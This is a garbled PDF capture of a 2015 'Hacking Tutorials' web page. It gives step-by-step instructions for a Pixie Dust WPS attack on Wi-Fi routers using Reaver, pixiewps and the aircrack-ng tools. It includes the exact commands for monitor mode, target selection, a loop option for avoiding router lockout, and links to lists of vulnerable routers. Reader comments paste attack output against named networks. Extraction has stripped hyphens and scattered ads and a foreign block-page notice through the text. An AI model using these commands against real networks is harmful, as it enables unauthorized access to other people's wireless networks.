10/28/2015

WPSPixieDustAttackinKaliLinuxwithReaver

Hacking Tutorials
Home

About Us

General

Wireless

Web

Scanning

Metasploit

Malware Analysis

Home Wifi Hacking Tutorials Pixie Dust Attack WPS in Kali Linux with Reaver

Pixie Dust Attack WPS in Kali Linux with

Reaver

Search...

Top Tutorials

The Top 10 Wifi Hacking Tools

in Kali Linux
Pixie Dust Attack WPS in Kali
Linux with Reaver
How to hack a TP link WR841N
router wireless network
How to hack a WordPress
website with WPScan
How to hack UPC wireless
networks and other WLAN pt
1

Subscribe

Enter your email address to subscribe to

Hacking Tutorials and receive notifications
of new tutorials by email.
Email Address
Subscribe

Pixie Dust Attack WPS with Reaver

In this tutorial we are going to do a pixie dust attack using Reaver 1.5.2, AircrackNG and Pixiewps. Pixie Dust
attack is an offline attack which exploits a WPS vulnerability. The tool, Pixiewps, is written in C and works with a
modified version of Reaver. When a wireless router is vulnerable for this attack retrieving the passphrase can be
done in seconds. A link to the list of pixie dust vulnerable routers is included at the bottom of this tutorial.

Pixie Dust Attack

Lets put the wifi interface in monitoring mode using:
airmonng start wlan0

Recent Tutorials

Dynamic Malware Analysis Tools

Basic Malware Analysis Tools
Websploit Wifi Jammer
Wifi adapter packet injection test

How to disable WiFi Sense on

Windows 10

Advertisment

If necessary kill the processes Kali is complaining about:

Rp1.545.000

Rp150.000

Rp195.000

Rp25.000

Rp100.000

Rp180.000

Categories
General Tutorials

Malware Analysis Tutorials

Metasploit Tutorials
Scanning Tutorials
Web Applications
For anyone getting the following errorin Kali Linux2.0 Sana:
[X] ERROR: Failed to open wlan0mon for capturing
Try the followingas a solution:
1. Put the device in Monitor mode Airmonng start wlan0

http://www.hackingtutorials.org/wifihackingtutorials/pixiedustattackwpsinkalilinuxwithreaver/

Wifi Hacking Tutorials

Popular

aircrackng airodumpng Brute

force Crunch Dynamic Malware Analysis

1/5

10/28/2015

WPSPixieDustAttackinKaliLinuxwithReaver

2. A monitoring interface will be started on wlan0mon

3. Use iwconfig to check if the interface MODE is in managed mode, if so then change it to monitor instead of
managed with the following commands:
ifconfig wlan0mon down
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up
4. iwconfig check if the mode is monitoring mode now
5. airodumpng wlan0mon
Start airodumpng to get the BSSID, MAC address and channel of our target.
airodumpng i wlan0mon
Now pick the target and use the BSSID and the channel for Reaver:

Hacking Hack UPC Router HeartBleed

Linux

Kali

Live hosts Macchanger MAC Spoofing

Malware Maskprocessor Metasploit Nikto

Nmap oclHashcat Open Port Scanning

Os Detection Password List Ping Scan Pixie

dust Pixie dust attack Pixie Dust

WPS attack pixiewps Port Scanning
Ransomware Reaver Scanning SMB
Vulnerabilities SYn Scan Top 10 Tox Ransomware
VPN

Virus

Vulnerability Scanning Wash

Reaver i wlan0mon b [BSSID] vv S c [AP channel]

Web application Webserver

We need the PKE, PKR, ehash 1 & ehash2, Enonce / Rnonce and the authkey from Reaver to use for pixiewps.

Websploit Wifi

hacking Wordpress

WPS Zenmap

Archives
October 2015

September 2015
August 2015
July 2015
June 2015
May 2015

Downloads

directory_scanner.py 428 downloads

PEiD Userdb 177 downloads

PEiD0.9520081103.zip 138
downloads
wifi_jammer.py 356 downloads
Now start pixiewps with the following arguments:

Components:
EHash1 is a hash in which we brute force the first half of the WPS PIN.
EHash2 is a hash in which we brute force the second half of the WPS PIN.
HMAC is a function that hashes all the data in parenthesis. The function is HMACSHA256.
PSK1 is the first half of the routers WPS PIN 10,000 possibilities
PSK2 is the second half of the routers WPS PIN 1,000 or 10,000 possibilities depending if we want to compute
the checksum. We just do 10,000 because it makes no time difference and its just easier.
PKE is the Public Key of the Enrollee used to verify the legitimacy of a WPS exchange and prevent replays.
PKR is the Public Key of the Registrar used to verify the legitimacy of a WPS exchange and prevent replays.
This routerdoes not seem to be vulnerable to pixie dust attack.

Start Download
Convert Any File to a PDF. Get the Free From Doc to Pdf App!

Avoiding Reaver router lockout with Pixiedust

loop
When using the P Pixiedust loop option, Reaver goes into a loop mode that breaks the WPS protocol by not
using M4 message to avoid lockouts. This option can only be used for PixieHash collecting to use with pixiewps.

http://www.hackingtutorials.org/wifihackingtutorials/pixiedustattackwpsinkalilinuxwithreaver/

2/5

10/28/2015

WPSPixieDustAttackinKaliLinuxwithReaver

WPS Pixie Dust Attack Tutorial in Kali Linux with Reaver

Thanks for watching and please subscribe to my YouTube channel for more hacking tutorials
More information: https://forums.kali.org/showthread.php?24286WPSPixieDustAttackOfflineWPSAttack
Database with routers vulnerable to the pixie dust attack:
https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit
Pixie WPS on github: https://github.com/wiire/pixiewps
Modified Reaver with pixie dust attack: https://github.com/t6x/reaverwpsforkt6x

Share to:
Tweet

Bagikan

36

Share

31

Share

Email
29%

48%

Related

Rp120.000 Rp227.765
23%

33%

Rp261.000 Rp450.000
63%

62%
Situs terlarang tidak dapat diakses melalui jaringan ini karena

Finding WPS enabled Wifi Networks How to hack a TP link WR841N router
Rp87.156 Rp190.000 terindikasi mengandung salah satu unsur
with Kali Linux Wash
wireless network
61%
55%
PROXY.
In "Wifi Hacking
Tutorials" Phising, SARA atau
In "Wifi
Hacking Tutorials"

The Top 10 Wifi Hacking Tools in Kali

Linux
In "Wifi Hacking Tutorials"

termasuk ke dalam kategori diatas, silahkan menghubungi

Rp129.960 Rp489.999
84%

aduankonten [at] mail.kominfo [dot] go [dot] id.

50%

How to hack UPC wireless networks and other WLAN pt 1

How to hack a TP link WR841N router wireless network
Rp138.250 Rp175.100

6 comments on Pixie Dust Attack WPS in Kali Linux with Reaver

Naflan
June 5, 2015 at 3:51 am

Hi I am Unware of installing pixiewps to kali please advice me

Reply

Hacking Tutorials
June 6, 2015 at 10:48 am

Hi, pixiewps is included with the latest update of Kali Linux. If you are running an older version of
Kali Linux try the following commands to update:
aptget update
aptget upgrade
aptget distupgrade

http://www.hackingtutorials.org/wifihackingtutorials/pixiedustattackwpsinkalilinuxwithreaver/

3/5

10/28/2015

WPSPixieDustAttackinKaliLinuxwithReaver

aptget distupgrade
This should update the tools and the OS.
Good luck!
Reply

Mini
September 14, 2015 at 4:37 pm

airmonng start wlan1Found 2 processes that could cause tlobure.If airodumpng, aireplayng or airtun
ng stops working aftera short period of time, you may want to kill some of them!PID Name2785
dhclient32790 dhclient3Process with PID 2790 dhclient3 is running on interface wlan0Interface Chipset Driverwlan1
Atheros AR9271 ath9k [phy1] monitor mode enabled on mon0wlan0 Broadcom b43 [phy0]airodumpng mon0BSSID
PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:26:4D:16:E4:67 62 43 0 0 5 54e WPA TKIP PSK
DARKANGEL_Netzwerk C0:25:06:A9:8C:62 75 24 0 0 11 54e. WPA2 CCMP PSK FRITZ!Box Fon WLAN 7390
68:7F:74:01:FA:FC 75 22 0 0 11 54 WPA2 CCMP PSK lufthaken C0:25:06:41:EE:4A 76 20 0 0 1 54e WPA2 CCMP PSK
FRITZ!Box Fon WLAN 7112 C0:25:06:DC:B0:A4 77 21 0 0 1 54e. WPA2 CCMP PSK FRITZ!Box 6320 Cable BSSID
STATION PWR Rate Lost Frames Probe not associated 54:26:96:84:0A:05 71 0 1 38 27 wash i mon0 C sreaver i
mon0 b 00:26:4D:16:E4:67 c 5 vv WPS Locked =NSending WSC NACK[!] WPS transaction failed code: 0 02, re
trying last pin[+] Nothing done, nothing to save.[+] 0.00% complete @ 20130103 10:03:31 0 seconds/pin[+] Trying
pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[!]
WARNING: Receive timeout occurred[+] Sending WSC NACK[!] WPS transaction failed code: 0 02, retrying last
pin[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity
response[!] WARNING: Receive timeout occurred[+] Sending WSC NACK[!] WPS transaction failed code: 0 02, re
trying last pin[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending
identity responseI am using TPLINK TLWN722Ntested injection and it works, but not getting any ARP,I have ran this
for the past 8hrs and still geting the same response.please can any one point me to what I doing wrong, and hoe to
get this thig working.
Reply

Said
October 7, 2015 at 1:27 am

thanks >Hacking Tutorials<

Reply

Miltiadis
October 9, 2015 at 11:50 am

Can anyone help me please ?

root@Miltos2ndBrain:~# reaver i wlan0mon b DC:0B:1A:22:0E:6A vv S c 11
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright c 2011, Tactical Network Solutions, Craig Heffner
mod by t6_x & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Switching wlan0mon to channel 11
[] Failed to retrieve a MAC address for interface wlan0mon!
root@Miltos2ndBrain:~#
Reply

Hacking Tutorials
October 10, 2015 at 9:14 am

Hi, have you put your wireless card into monitoring mode with airmonng and is it up when you
run ifconfig?
Reply

Leave a Reply
Your email address will not be published. Required fields are marked *
Name *

Email *

Website

http://www.hackingtutorials.org/wifihackingtutorials/pixiedustattackwpsinkalilinuxwithreaver/

4/5

10/28/2015

WPSPixieDustAttackinKaliLinuxwithReaver

Comment *

Post Comment

Notify me of followup comments by

email.

Notify me of new posts by email.

Recent Hacking Tutorials

Top Hacking Tutorials

Dynamic Malware Analysis Tools

The Top 10 Wifi Hacking Tools in Kali Linux

Basic Malware Analysis Tools

Pixie Dust Attack WPS in Kali Linux with Reaver

Websploit Wifi Jammer

How to hack a TP link WR841N router wireless network

Wifi adapter packet injection test

How to hack a WordPress website with WPScan

How to disable WiFi Sense on Windows 10

How to hack UPC wireless networks and other WLAN pt 1

Cracking WPA with oclHashcat GPU on Windows pt 2
Finding WPS enabled Wifi Networks with Kali Linux Wash
Installing VPN on Kali Linux

Hacking Tutorials 2015

http://www.hackingtutorials.org/wifihackingtutorials/pixiedustattackwpsinkalilinuxwithreaver/

5/5